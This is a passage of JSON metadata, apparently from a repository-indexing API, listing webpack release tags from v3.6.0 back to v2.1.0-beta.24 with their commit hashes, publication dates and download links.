,"manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecos